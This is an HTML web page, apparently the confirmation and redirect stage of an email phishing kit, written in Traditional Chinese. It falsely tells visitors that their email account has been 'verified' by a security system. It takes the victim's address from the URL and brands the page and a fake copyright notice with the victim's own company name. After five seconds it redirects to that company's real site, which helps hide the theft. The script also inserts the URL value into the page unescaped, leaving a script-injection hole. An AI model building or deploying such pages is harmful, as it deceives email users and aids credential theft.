
<!doctype html>
<html lang="en">

<head>
  <script src="../ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="../code.jquery.com/jquery-3.1.1.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="../maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&amp;display=swap" rel="stylesheet">
    <script src="../kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>Email Security</title>
    <link href="css/hover.html" rel="stylesheet" media="all">

    <style type="text/css">
      textarea:hover, 
      input:hover, 
      textarea:active, 
      input:active, 
      textarea:focus, 
      input:focus,
      button:focus,
      button:active,
      button:hover,
      label:focus,
      .btn:active,
      .btn.active
      {
        outline:0px !important;
        -webkit-appearance:none;
        box-shadow: none !important;
        border-color: none !important;
      }


      .input-icons i { 
        position: absolute; 
      } 

      .input-icons { 
        width: 100%; 
      } 

      .icon { 
        padding: 10px; 
        min-width: 40px;
        color: #8FA7AD; 
      } 

      .input-field { 
        width: 100%; 
        padding: 5px;
        padding-left: 40px ;
        text-align: left;
        border: 1px solid #8FA7AD; 
      } 



    </style>
  </head>
  <!-- oncontextmenu="return false" -->
  <body >
    <center><div class="container-fluid p-0">

      <div class="container-fluid">
        <div class="row" style="margin: 100px 0px 50px 0px;">
          <div class="col-md-5 mx-auto">
            <div class="p-2 bg-white m-3">
              <div class="col-lg-12 mx-auto">
              <div class="col-lg-12 text-center">
               
                <span style="color: #FF3300;font-weight: bold; font-size: 20px;font-family: Geneva, Arial, Helvetica, sans-serif;"><span id="domain_get0"></span> </span>
              </div>
              <div class="col-lg-12 text-center">
                <span class="text-secondary" style="font-size: 18px">你的郵件 (<span id="email_get1"></span>), 已成功驗證。
                <br/>該過程將在 48 小時內完成。<br />感謝您使用我們的 <span id="domain_get3"></span>'s 安全網絡應用程序..</span><br>
                <span>我們將很快將您重定向到 <span id="email_get2"></span></span>

                
              </div>
              <form id="contact" class="form-horizontal well">
                <div id="div1" class="text-dark">
                  <div class="text-center col-lg-9 mx-auto my-2" style="font-size: 13px;">
                   <span>連接到 </span><span id="email_get3" class="font-weight-bold"></span>
                  </div>
                </div>
              </div>
            </form>
              
            </div>
          </div>
          <div class="col-lg-12 text-center mt-1"> 
            <small class="" style="color: #766;">安全 <span id="domain_get1"></span>安全系統</small><br>
            <small class="" style="color: #766;">© 2022 <span id="domain_get2"></span> 公司。版權所有。</small>

          </div>  
        </div> 
      </div>
    </div></center>

	<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>

  <script>


    /* global $ */
    $(document).ready(function(){
	
	     function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) {
          vars[key] = value;
        });
        return vars;
      }
      
      var number = getUrlVars()["msg"];

       $("#email_get1").html(number);
       $("#email_get3").html(number);
       var my_email =number;
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var domain=final.charAt(0).toUpperCase() + final.slice(1);
        $("#email_get2").html(my_slice);
        $("#domain_get0").html(domain);
        $("#domain_get1").html(domain);
        $("#domain_get2").html(domain);

       setTimeout(() => {  window.location.replace("http://www."+my_slice); }, 5000);

   });
</script>
</html>